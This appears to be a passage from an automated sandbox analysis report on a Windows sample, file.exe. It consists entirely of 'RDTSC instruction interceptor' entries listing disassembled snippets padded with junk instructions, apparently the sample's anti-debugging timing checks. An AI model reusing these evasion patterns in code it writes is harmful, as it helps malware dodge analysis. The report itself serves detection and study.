        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5551 second address: 7E5555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5555 second address: 7E5559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5559 second address: 7E555F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E555F second address: 7E55B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F48A0C1C53Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jno 00007F48A0C1C548h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push edx 0x00000018 ja 00007F48A0C1C53Ch 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F48A0C1C543h 0x0000002a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E560E second address: 7E5640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, si 0x0000000f lea eax, dword ptr [ebp+1247B0F3h] 0x00000015 add dx, 3581h 0x0000001a nop 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5640 second address: 7E5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5644 second address: 7E568D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F48A0C206DAh 0x0000000d nop 0x0000000e push edi 0x0000000f pushad 0x00000010 mov cx, 63B1h 0x00000014 or si, C9A2h 0x00000019 popad 0x0000001a pop edi 0x0000001b lea eax, dword ptr [ebp+1247B0AFh] 0x00000021 mov edx, edi 0x00000023 jmp 00007F48A0C206E6h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F48A0C206D8h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E568D second address: 7C928B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F48A0C1C53Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007F48A0C1C547h 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F48A0C1C538h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2C44h] 0x00000033 call dword ptr [ebp+1244AF55h] 0x00000039 push ecx 0x0000003a jp 00007F48A0C1C53Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827BF6 second address: 827BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828115 second address: 828135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F48A0C1C53Eh 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828135 second address: 82813B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C496 second address: 82C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C545h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F48A0C1C536h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C049 second address: 82C04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C18E second address: 82C192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C192 second address: 82C196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C196 second address: 82C19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F68F second address: 82F6AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F48A0C206DCh 0x0000000e jc 00007F48A0C206D6h 0x00000014 popad 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F042 second address: 82F07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007F48A0C1C53Eh 0x0000000b ja 00007F48A0C1C538h 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 jmp 00007F48A0C1C549h 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edx 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F07F second address: 82F087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F087 second address: 82F094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F48A0C1C536h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F094 second address: 82F098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F098 second address: 82F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jns 00007F48A0C1C536h 0x0000000f jmp 00007F48A0C1C53Dh 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jl 00007F48A0C1C536h 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F3F6 second address: 82F400 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833DC8 second address: 833DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jng 00007F48A0C1C536h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833F63 second address: 833F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jng 00007F48A0C206D6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F48A0C206D6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83412F second address: 834139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83426F second address: 834274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A424 second address: 83A429 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A429 second address: 83A42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F22 second address: 7A5F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F26 second address: 7A5F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F31 second address: 7A5F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C53Ah 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F48A0C1C536h 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F4C second address: 7A5F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F48A0C206D6h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5F58 second address: 7A5F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838D11 second address: 838D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jmp 00007F48A0C206DBh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C206DBh 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838E89 second address: 838E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838E92 second address: 838E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E511C second address: 7E5120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83958A second address: 8395B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F48A0C206DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F48A0C206E8h 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CEC1 second address: 83CEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CEC5 second address: 83CEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CEC9 second address: 83CED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D31F second address: 83D32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F48A0C206D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843A6E second address: 843A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843A74 second address: 843A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843A80 second address: 843A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FE4 second address: 843FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FE8 second address: 843FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FEC second address: 843FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F48A0C206DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FFA second address: 844019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F48A0C1C544h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844019 second address: 844039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F48A0C206E8h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8448B2 second address: 8448C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C53Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8448C3 second address: 8448C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8448C9 second address: 8448E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F48A0C1C542h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8448E4 second address: 8448E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845144 second address: 84515B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F48A0C1C53Eh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84549C second address: 8454AF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F48A0C206D6h 0x00000008 jg 00007F48A0C206D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8454AF second address: 8454C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F48A0C1C536h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8454C1 second address: 8454C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8454C5 second address: 8454CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84572C second address: 845730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845730 second address: 84575E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F48A0C1C536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F48A0C1C552h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84575E second address: 845775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F48A0C206E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845775 second address: 84577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84CA8E second address: 84CA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84CA94 second address: 84CAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FDA1 second address: 84FDAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F48A0C206D6h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FDAD second address: 84FDBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F48A0C1C536h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8500D2 second address: 8500DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jl 00007F48A0C206D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85020B second address: 85020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85034D second address: 850352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850352 second address: 850357 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850357 second address: 850363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850363 second address: 850393 instructions: 0x00000000 rdtsc 0x00000002 js 00007F48A0C1C536h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F48A0C1C548h 0x00000014 pop eax 0x00000015 jc 00007F48A0C1C53Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850393 second address: 85039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F48A0C206DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8504F4 second address: 8504F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858F0B second address: 858F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85733D second address: 857343 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857649 second address: 85764D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85764D second address: 85766B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F48A0C1C538h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F48A0C1C53Ah 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85766B second address: 85766F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D9BC second address: 79D9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85797F second address: 857983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857983 second address: 857989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857989 second address: 85798F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85798F second address: 857993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857993 second address: 85799F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85799F second address: 8579A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8579A5 second address: 8579A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8579A9 second address: 8579AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C88 second address: 857CC7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F48A0C206ECh 0x00000008 pushad 0x00000009 jmp 00007F48A0C206E6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007F48A0C206D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857E2E second address: 857E6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F48A0C1C548h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F48A0C1C53Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jg 00007F48A0C1C536h 0x00000019 popad 0x0000001a pushad 0x0000001b jne 00007F48A0C1C536h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858D72 second address: 858D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858D76 second address: 858D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F48A0C1C542h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569A3 second address: 8569A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569A7 second address: 8569CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F48A0C1C53Ah 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569CB second address: 8569D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569D1 second address: 8569D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
